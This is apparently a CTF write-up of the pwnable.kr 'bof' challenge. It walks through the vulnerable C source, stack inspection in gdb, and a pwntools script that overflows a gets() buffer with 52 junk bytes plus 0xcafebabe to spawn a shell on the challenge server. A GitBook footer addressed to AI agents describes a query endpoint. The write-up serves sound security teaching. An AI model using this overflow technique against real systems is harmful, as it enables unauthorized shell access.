> For the complete documentation index, see [llms.txt](https://0xten.gitbook.io/public/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xten.gitbook.io/public/pwnable/toddlers-bottle/bof.md). # bof ## Buffer Overflow Running checksec against the binary we see that it's full of protections, probably meant to avoid uninteded solutions: ![](/files/-MZi8OQ0YNd4gesvqUEj) Running the program and feeding it some A's we can see it's vulnerable to a buffer overflow. ![](/files/-MZiBC7aDUesnYRSz3K2) Reading the source code we see it has two functions, func() and main(): ```c include #include #include void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } ``` main is executed when we run the program and it simply runs the func() function with 0xdeadbeef as the argument. ```c int main(int argc, char* argv[]){ func(0xdeadbeef); return 0; } ``` The func() function prompts the user to input data (that's where our overflow is). Then the function checks if the value received from the main() function equals 0xcafebabe and if does the program calls /bin/sh and drops us into a shell. ```c void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafebabe){ system("/bin/sh"); } else{ printf("Nah..\n"); } } ``` Opening the program in gdb and disassambling the func() function we can see exactly where the comparison happens. ```c 0x00000654 <+40>: cmp DWORD PTR [ebp+0x8],0xcafebabe ``` Now we want to set a breakpoint in that address so we can see how far overwrote the stack and what's the exact amount of junk we want to send until we overwrite the address where 0xdeadbeef is stored. `x/60gx $esp` shows: ```c 0xffffcf40: 0x0000000000000000 0x4141414156555034 0xffffcf50: 0x4141414141414141 0x4141414141414141 0xffffcf60: 0x4141414141414141 0x4141414141414141 0xffffcf70: 0x4141414141414141 0x4141414141414141 0xffffcf80: 0x00000000deadbe00 0x00000000565556b9 ``` So if we send 52 bytes of junk, the 8 following bytes will overwrite the address where the argument to func() is stored, which we know it's ebp + 8, so it's 0xffffcf80. Finally, all we need to do is send 52 bytes of junk followed by 0xcafebabe and we'll get a shell. Here is my exploit code: ```python #!/usr/bin/env python3 from pwn import * # Definitions e = context.binary = ELF('./bof', checksec=False) #io = process(e.path) io = remote('pwnable.kr',9000) # Junk junk = 52*b'A' # Payload payload = junk + p64(0xcafebabe) # exploit #io.recvuntil('overflow me : \n') io.sendline(payload) io.interactive() ``` ![](/files/-MZiFbiVBKURVDwCNxNH) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xten.gitbook.io/public/pwnable/toddlers-bottle/bof.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.